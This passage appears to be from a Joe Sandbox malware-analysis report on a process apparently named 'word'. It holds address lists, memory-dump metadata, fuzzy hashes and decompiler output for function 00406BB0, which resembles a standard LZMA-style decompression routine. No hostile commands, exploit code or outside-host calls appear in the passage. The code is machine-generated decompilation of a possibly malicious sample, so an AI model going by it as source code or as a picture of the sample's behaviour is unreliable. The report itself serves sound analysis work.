0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406bc0
0x00406bc7
0x00406bcd
0x00406bd3
0x00000000
0x00406bd7
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c0e
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c59
0x00406c5c
0x00406c84
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c76
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
